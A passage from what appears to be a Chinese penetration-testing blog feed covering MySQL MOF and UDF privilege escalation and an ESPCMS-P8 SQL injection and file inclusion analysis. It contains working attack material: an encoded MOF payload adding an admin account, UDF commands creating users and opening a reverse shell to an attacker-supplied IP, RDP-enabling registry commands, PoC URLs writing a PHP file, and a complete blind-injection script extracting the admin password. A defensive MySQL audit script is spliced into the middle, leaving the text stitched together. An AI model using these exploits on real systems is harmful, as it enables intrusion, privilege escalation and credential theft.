105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92
,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';</span><br></pre></td></tr></table></figure></p><p>Promoting to administrator<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select char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into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';</span><br></pre></td></tr></table></figure></p><h2 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF privilege escalation</h2><h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>Principle</h3><p>UDF privilege escalation abuses MySQL's user-defined function feature to turn a MySQL account into system-level privileges; it is generally applied to Windows 2000 and Windows 2003 systems</p><h3 id="利用条件-1"><a href="#利用条件-1" class="headerlink" title="利用条件"></a>Preconditions</h3><p>1. For MySQL versions above 5.1, udf.dll must be placed in the lib\plugin folder under the MySQL installation directory.<br>2. For MySQL versions below 5.1, udf.dll goes in c:\windows\system32 on Windows 2003 and in c:\winnt\system32 on Windows 2000.<br>3. The MySQL account you hold has INSERT and DELETE privileges on the mysql database, so that functions can be created and dropped; root is best, but any other account with the privileges root has will also do.<br>4. Permission to write udf.dll into the corresponding directory.</p><h3 id="利用方式-1"><a href="#利用方式-1" class="headerlink" title="利用方式"></a>Exploitation</h3><h4 id="将udf-dll导入到相应目录中"><a href="#将udf-dll导入到相应目录中" class="headerlink" title="将udf.dll导入到相应目录中"></a>Import udf.dll into the corresponding directory</h4><p>Check the database and operating system architecture</p><blockquote><blockquote><p>select @@version_compile_os, @@version_compile_machine;</p></blockquote></blockquote><p>Check the plugin folder</p><blockquote><blockquote><p>select @@plugin_dir ;<br>show variables like '%plugin%';</p></blockquote></blockquote><p>On versions above 5.1 the /lib/plugin directory does not exist by default; NTFS ADS streams can be used to create the folders<br><figure class="highlight plain"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select @@basedir; -- find the MySQL directory </span><br><span class="line">select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; -- create the lib directory via NTFS ADS</span><br><span class="line">select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; -- create the plugin directory via NTFS ADS</span><br></pre></td></tr></table></figure></p><p>Note: udf.dll can be found under sqlmap/udf/mysql/windows. The udf.dll shipped with sqlmap is XOR-encoded, so be sure to decode it before use; the decoding tool is also in sqlmap, cloak.py under sqlmap/extra/cloak. Also note that the bitness that matters here is MySQL's bitness, not the target system's.</p><blockquote><blockquote><p>cloak.py -d -i udf.dll</p></blockquote></blockquote><p>msf also ships one: /usr/share/metasploit-framework/data/exploits/mysql/</p><h4 id="使用方式"><a href="#使用方式" class="headerlink" title="使用方式"></a>Usage</h4><p>Create</p><blockquote><blockquote><p>create function cmdshell returns string soname "lib_mysqludf_sys.dll";<br>Only functions that exist in the UDF can be created</p></blockquote></blockquote><p>Use</p><blockquote><blockquote><p>select cmdshell('net user hacker passwd /add');</p></blockquote></blockquote><p>Drop</p><blockquote><blockquote><p>drop function cmdshell;</p></blockquote></blockquote><h4 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>Common functions</h4><p>sys_exec: executes a command;<br>sys_eval: executes a system command and returns its standard output<br>sys_get: uses 'getenv' to return the value of an environment variable. </p><h2 id="mysql反弹shell提权"><a href="#mysql反弹shell提权" class="headerlink" title="mysql反弹shell提权"></a>MySQL reverse shell privilege escalation</h2><p>This is really UDF escalation as well, just in a different scenario: say we have no webshell but have happened to obtain the MySQL root password (weak credentials and so on), and the target's database happens to be reachable externally or has phpMyAdmin. Then we can first insert the contents of the udf.dll above into a table and then export it to the /lib/plugin directory.<br>Then create the function backshell</p><blockquote><blockquote><p>CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; -- create backshell</p></blockquote></blockquote><p>Start a listener on a server with its own public host</p><blockquote><blockquote><p>nc -vv -l -p 
12345</p></blockquote></blockquote><p>Finally, execute backshell</p><blockquote><blockquote><p>select backshell("你的ip地址",12345);</p></blockquote></blockquote><h2 id="开启3389端口"><a href="#开启3389端口" class="headerlink" title="开启3389端口"></a>Enabling port 3389</h2><p>Using a bat script<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">echo Windows Registry Editor Version 5.00>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg</span><br><span class="line">echo "fDenyTSConnections"=dword:00000000>>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg</span><br><span class="line">echo "PortNumber"=dword:00000d3d>>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg</span><br><span class="line">echo "PortNumber"=dword:00000d3d>>3389.reg</span><br><span class="line">regedit /s 3389.reg</span><br><span class="line">del 3389.reg</span><br></pre></td></tr></table></figure></p><p>Using sys_eval() and similar<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select sys_eval('REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f');</span><br></pre></td></tr></table></figure></p><p>(note the double backslashes)</p><h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>References</h2><p><a href="https://blog.csdn.net/he_and/article/details/81434865" target="_blank" 
rel="noopener">https://blog.csdn.net/he_and/article/details/81434865</a><br><a href="https://www.jianshu.com/p/5b34c1b6dee7" target="_blank" rel="noopener">https://www.jianshu.com/p/5b34c1b6dee7</a><br><a href="https://blog.csdn.net/qq_37053007/article/details/80143117" target="_blank" rel="noopener">https://blog.csdn.net/qq_37053007/article/details/80143117</a><br><a href="https://www.cnblogs.com/h4ck0ne/p/5154602.html" target="_blank" rel="noopener">https://www.cnblogs.com/h4ck0ne/p/5154602.html</a><br><a href="https://www.freebuf.com/articles/system/163144.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/163144.html</a></p>]]></content>
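Every technique in this post depends on the same handful of server-side preconditions: file I/O not restricted by secure_file_priv, an account holding the FILE privilege, the service running as SYSTEM or root, and the server reachable remotely. The following is an added example, not part of the original post: a Python audit over a constructed my.ini-style option file and constructed mysql.user rows that reports which of those preconditions are still open, shown against a hardened configuration.

```python
"""Audit the MySQL preconditions the MOF and UDF techniques depend on.

Added example, not from the original post. Inputs are constructed here:
a my.ini-style option file, rows shaped like the output of
    SELECT user, host, File_priv FROM mysql.user
and the account the service runs as. Nothing connects to a server.
"""
import configparser

PRIVILEGED_SERVICE_ACCOUNTS = {"localsystem", "system", "root", "administrator"}


def parse_option_file(text):
    """Return the [mysqld] options as a dict, with '-' normalised to '_'."""
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    parser.read_string(text)
    if not parser.has_section("mysqld"):
        return {}
    return {key.replace("-", "_"): (value or "").strip().strip('"')
            for key, value in parser.items("mysqld")}


def audit(option_file_text, user_rows, service_account):
    """Return a list of (code, message) findings; an empty list means hardened."""
    findings = []
    cfg = parse_option_file(option_file_text)

    # Shared precondition: LOAD_FILE()/INTO DUMPFILE may write anywhere the
    # service can. NULL disables file I/O entirely, a directory restricts it,
    # and unset or empty means no restriction at all.
    sfp = cfg.get("secure_file_priv")
    if sfp is None or sfp == "":
        findings.append(("SECURE_FILE_PRIV",
                         "secure_file_priv is unset or empty: INTO DUMPFILE can drop "
                         "nullevt.mof or udf.dll into any directory the service can write"))

    # Whether a dropped file lands in a protected directory depends on the
    # service identity (the post's first precondition).
    if service_account.lower() in PRIVILEGED_SERVICE_ACCOUNTS:
        findings.append(("SERVICE_ACCOUNT",
                         f"service runs as {service_account}: writes reach wbem\\mof and lib\\plugin"))

    # The reverse-shell variant needs the server reachable from outside.
    bind = cfg.get("bind_address", "")
    if bind in ("", "0.0.0.0", "::"):
        findings.append(("BIND_ADDRESS", "server listens on all interfaces"))

    for user, host, file_priv in user_rows:
        if file_priv.upper() == "Y":
            findings.append(("FILE_PRIV", f"{user}@{host} holds the FILE privilege"))
        if user == "root" and host in ("%", ""):
            findings.append(("REMOTE_ROOT", f"root may log in from any host ({host!r})"))
    return findings


# Constructed option files resembling the Windows layout used in the post.
WEAK_INI = """
[mysqld]
basedir="C:/Program Files/MySQL/MySQL Server 5.1/"
datadir="C:/ProgramData/MySQL/MySQL Server 5.1/Data/"
port=3306
secure-file-priv=
"""

HARDENED_INI = """
[mysqld]
basedir="C:/Program Files/MySQL/MySQL Server 5.1/"
datadir="C:/ProgramData/MySQL/MySQL Server 5.1/Data/"
port=3306
bind-address=127.0.0.1
secure-file-priv=NULL
"""

# Constructed (user, host, File_priv) rows.
WEAK_USERS = [("root", "%", "Y"), ("app", "localhost", "N"), ("backup", "localhost", "Y")]
HARDENED_USERS = [("root", "localhost", "N"), ("app", "localhost", "N")]


if __name__ == "__main__":
    for label, ini, users, svc in (("weak", WEAK_INI, WEAK_USERS, "LocalSystem"),
                                   ("hardened", HARDENED_INI, HARDENED_USERS, "NT SERVICE\\MySQL")):
        results = audit(ini, users, svc)
        print(f"{label}: {len(results)} open precondition(s)")
        for code, message in results:
            print(f"  [{code}] {message}")
```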
<summary type="html">
<h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>MOF privilege escalation</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="提权" scheme="http://yoursite.com/tags/%E6%8F%90%E6%9D%83/"/>
</entry>
<entry>
<title>ESPCMS-P8 front-end SQL injection and file inclusion vulnerabilities</title>
<link href="http://yoursite.com/2019/03/21/ESPCMS-P8%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E4%B8%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/"/>
<id>http://yoursite.com/2019/03/21/ESPCMS-P8前台SQL注入与文件包含漏洞/</id>
<published>2019-03-21T09:52:52.000Z</published>
<updated>2020-03-14T15:37:18.036Z</updated>
<content type="html"><![CDATA[<h1 id="前台SQL注入漏洞"><a href="#前台SQL注入漏洞" class="headerlink" title="前台SQL注入漏洞"></a>Front-end SQL injection vulnerability</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Overview</h2><p>This SQL injection vulnerability is in the front-end search page; by crafting a serialized malicious parameter it can be exploited through blind SQL injection or file operations.</p><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>Analysis</h2><p>espcms_web/Search.php contains the following code:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">if ($_GET['attr_array']) {</span><br><span class="line">$_REQUEST['attr_array'] = unserialize(stripslashes($_GET['attr_array']));</span><br><span class="line">}</span><br><span class="line">$attr_array = $_REQUEST['attr_array'] && is_array($_REQUEST['attr_array']) ? 
$_REQUEST['attr_array'] : array();</span><br><span class="line">if (is_array($attr_array) && count($attr_array) > 0) {</span><br><span class="line">foreach ($attr_array as $key => $value) {</span><br><span class="line">if ($value) {</span><br><span class="line">$db_att_where = " AND isclass=1 AND attrname='$key'";</span><br><span class="line">$countnum = espcms_db_num($db_table_model_att, $db_att_where);</span><br><span class="line">if ($countnum > 0) {</span><br><span class="line">if (is_array($value) && count($value) > 0) {</span><br><span class="line">$db_where_or = '';</span><br><span class="line">foreach ($value as $i => $where_val) {</span><br><span class="line">$db_where_or .= $i > 0 ? " OR FIND_IN_SET('$where_val',b.$key)" : " FIND_IN_SET('$where_val',b.$key)";</span><br><span class="line">}</span><br><span class="line">$db_where .= " AND ($db_where_or)";</span><br><span class="line">} else {</span><br><span class="line">$db_where .= " AND b.$key='$value'";</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>Here the attr_array parameter received via GET is unserialized, then every key/value pair in attr_array is taken out, and if $value is non-empty the following statements run:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">if ($value) {</span><br><span class="line">$db_att_where = " AND isclass=1 AND attrname='$key'"; // key point of the vulnerability</span><br><span class="line">$countnum = espcms_db_num($db_table_model_att, $db_att_where); 
//漏洞关键点</span><br><span class="line">if ($countnum > 0) {</span><br><span class="line">if (is_array($value) && count($value) > 0) {</span><br><span class="line">$db_where_or = '';</span><br><span class="line">foreach ($value as $i => $where_val) {</span><br><span class="line">$db_where_or .= $i > 0 ? " OR FIND_IN_SET('$where_val',b.$key)" : " FIND_IN_SET('$where_val',b.$key)";</span><br><span class="line">}</span><br><span class="line">$db_where .= " AND ($db_where_or)";</span><br><span class="line">} else {</span><br><span class="line">$db_where .= " AND b.$key='$value'";</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$key的值会被拼接到$db_att_where字符串,然后$db_att_where被传入espcms_db_num()函数中,这个过程未做任何过滤,跟进espcms_db_num中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function espcms_db_num($tableName, $db_where = null, $num_str = '*') {</span><br><span class="line">global $espcms_link_db;</span><br><span class="line">if (!$tableName) {</span><br><span class="line">return false;</span><br><span class="line">}</span><br><span class="line">$sql_where = " WHERE 1=1" . 
$db_where;</span><br><span class="line">$db_sql = "SELECT COUNT($num_str) AS num FROM $tableName $sql_where";</span><br><span class="line">$db_read = $espcms_link_db->db_array_read($db_sql);</span><br><span class="line">return $db_read['num'];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$db_att_where被拼接到$db_sql中,仍然未做过滤,继续跟进至db_array_read():<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">public function db_array_read($sql) {</span><br><span class="line">$query = $this->db_query($sql);</span><br><span class="line">return $this->db_array_list($query);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>这里执行了数据库执行了$sql语句,由于从始至终都未做过滤,因此产生了SQL注入漏洞</p><h2 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h2><h3 id="写入文件"><a href="#写入文件" class="headerlink" title="写入文件"></a>写入文件</h3><p><a href="http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:69:"1'" target="_blank" rel="noopener">http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:69:"1'</a> union select “<?php phpinfo(); ?>” into dumpfile “c:\\1234.php”–+”;s:3:”aaa”;}&keyword=1 </p><p>可以写入一个php文件</p><h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p><a href="http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:64:"1'" target="_blank" rel="noopener">http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:64:"1'</a> union select if(ascii(substr(user(),1,1))=114,sleep(10),1)–+”;s:3:”aaa”;}&keyword=1<br>成功延迟10秒,说明用户名第一位是’r’</p><h2 id="py脚本"><a href="#py脚本" class="headerlink" title="py脚本"></a>py脚本</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">#!/python</span><br><span class="line">#coding = utf-8</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span 
class="line"># target:</span><br><span class="line">url = "http://127.0.0.1"</span><br><span class="line"></span><br><span class="line">s = "/index.php?ac=Search&at=List&keyword=1&"</span><br><span class="line"># payload:</span><br><span class="line">payload = "attr_array=a:1:{s:104:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line">payload2 = "attr_array=a:1:{s:105:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line">payload4 = "attr_array=a:1:{s:106:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line"></span><br><span class="line">def Get_User(lenth):</span><br><span class="line"> name = ''</span><br><span class="line"> x = 0</span><br><span class="line"> i = 1</span><br><span class="line"> while i<lenth+1:</span><br><span class="line"> try:</span><br><span class="line"> l = 0</span><br><span class="line"> r = 126</span><br><span class="line"> while l <= r:</span><br><span class="line"> x = (l + r) // 2</span><br><span class="line"> if x > 99 and i < 10:</span><br><span class="line"> target = url + s + payload2 % (i, x)</span><br><span class="line"> elif x < 99 and i < 10:</span><br><span class="line"> target = url + s + payload % (i, x)</span><br><span class="line"> elif x > 99 and i >= 10:</span><br><span class="line"> target = url + s + payload4 % (i,x)</span><br><span class="line"> else:</span><br><span class="line"> target = url + s + payload2 % (i,x)</span><br><span class="line"> print(target)</span><br><span class="line"> start_time = time.time()</span><br><span class="line"> response = requests.get(target, timeout = 20)</span><br><span class="line"> end_time = time.time()</span><br><span class="line"> print(x)</span><br><span class="line"> if end_time - 
start_time < 5 :</span><br><span class="line"> r = x - 1</span><br><span class="line"> else:</span><br><span class="line"> l = x + 1</span><br><span class="line"> x = (l + r) // 2 + 1</span><br><span class="line"> name = name + chr(x)</span><br><span class="line"> except requests.exceptions.ConnectionError:</span><br><span class="line"> response.status_code = "Connection refused"</span><br><span class="line"> print('retry....')</span><br><span class="line"> time.sleep(2)</span><br><span class="line"> i = i - 1</span><br><span class="line"> i += 1</span><br><span class="line"> return name</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line"> print("start......\n")</span><br><span class="line"> name = Get_User(32)</span><br><span class="line"> print(name)</span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure><h1 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>在espcms_web/Member.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">public static function in_JsLogin() {</span><br><span class="line">global $espcms_web_templates, $espcms_command;</span><br><span class="line">$espcms_web_templates->libfile = true;</span><br><span class="line">$member_app_config = ESPCMS_Core::get_app_config('member', false);</span><br><span class="line">if (!$member_app_config['isetup'] || !$member_app_config['isopen']) {</span><br><span class="line">ESPCMS_Dialog::Message_Page('app_close');</span><br><span class="line">}</span><br><span class="line">$member_con = unserialize($member_app_config['appconfig']);</span><br><span class="line">if (ESPCMS_MemberAuthority::authorityWebVerify(true)) {</span><br><span class="line">$member_info = ESPCMS_MemberAuthority::getMemberInfo();</span><br><span class="line">$filename = $_GET['info_file'] ? $_GET['info_file'] : 'member_info';</span><br><span class="line">$espcms_web_templates->into('member', $member_info);</span><br><span class="line">} else {</span><br><span class="line">$filename = $_GET['login_file'] ? $_GET['login_file'] : 'member_login';</span><br><span class="line">}</span><br><span class="line">$espcms_web_templates->into('tokenkey', token('member_login'));</span><br><span class="line">$espcms_web_templates->into('mlink', MemberLink::get_link());</span><br><span class="line">$espcms_web_templates->into('seccodelink', PublicLink::get_verfication('seccodelink'));</span><br><span class="line">$espcms_web_templates->into('verify_isopen', $member_con['MEMBER_LOGIN_VERIFY'] && $espcms_command['SAFETY_ISVERIFICATION_CODE'] ? 
1 : 0);</span><br><span class="line">$espcms_web_templates->into('member_con', $member_con);</span><br><span class="line">$output = $espcms_web_templates->fetch('lib/' . $filename);</span><br><span class="line">$outHTML = addslashes($output);</span><br><span class="line">$textArray = preg_split('/[\r\n]/i', $outHTML);</span><br><span class="line">if (is_array($textArray)) {</span><br><span class="line">$outHTML = null;</span><br><span class="line">foreach ($textArray as $key => $value) {</span><br><span class="line">$outHTML .= 'document.write("' . $value . '");';</span><br><span class="line">}</span><br><span class="line">exit($outHTML);</span><br><span class="line">} else {</span><br><span class="line">exit('document.writeln("' . $outHTML . '")');</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该段代码先读入$filename参数,然后:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$out = $espcms_web_templates->fetch('lib/' . 
$filename);</span><br></pre></td></tr></table></figure></p><p>$filename被传入espcms_web_templates->fetch()中,跟进:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">public function fetch($fetch_filename, $cache_fileid = null, $out_html = null, $ispack = false) {</span><br><span class="line">......</span><br><span class="line">require_once 'ESPCMS_Templates_Parser.php';</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$fetch_filename = $this->templates_themss_dirname . $fetch_filename . $this->templatesfileex;</span><br><span class="line">$templates_filename = $this->templates_path_dir . $fetch_filename;</span><br><span class="line">} else {</span><br><span class="line">$templates_filename = $this->templates_path_dir . $fetch_filename;</span><br><span class="line">}</span><br><span class="line">$parsed_file = $this->html_compile_dir . 
md5($templates_filename) . '.php';</span><br><span class="line">if ($this->iscaching) {</span><br><span class="line">if ($this->tempcheckcache($fetch_filename, $cache_fileid)) {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">$this->tempcachesave($fetch_filename, $cache_fileid);</span><br><span class="line">$out = $this->template_out;</span><br><span class="line">} else {</span><br><span class="line">$out = $this->template_out;</span><br><span class="line">}</span><br><span class="line">} else {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$out = $this->temprequire($parsed_file);</span><br><span class="line">} else {</span><br><span class="line">$out = file_get_contents($parsed_file);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p><p>其中$parsed_file是由传入的MD5($filename)加路径构成的php文件,跟进后发现如果$filename最近改动过的话会重新将其传入$parsed_file中,然后$parsed_file传入$this->temprequire()中,如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">} else {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$out = $this->temprequire($parsed_file);</span><br><span class="line">} else {</span><br><span class="line">$out = file_get_contents($parsed_file);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$this->temprequire()函数中会包含$parsed_file:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">private function temprequire($filename) {</span><br><span class="line">ob_start();</span><br><span class="line">include $filename; //关键点</span><br><span class="line">$content = ob_get_contents();</span><br><span class="line">ob_end_clean();</span><br><span class="line">return $content;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><h2 id="poc-1"><a href="#poc-1" class="headerlink" 
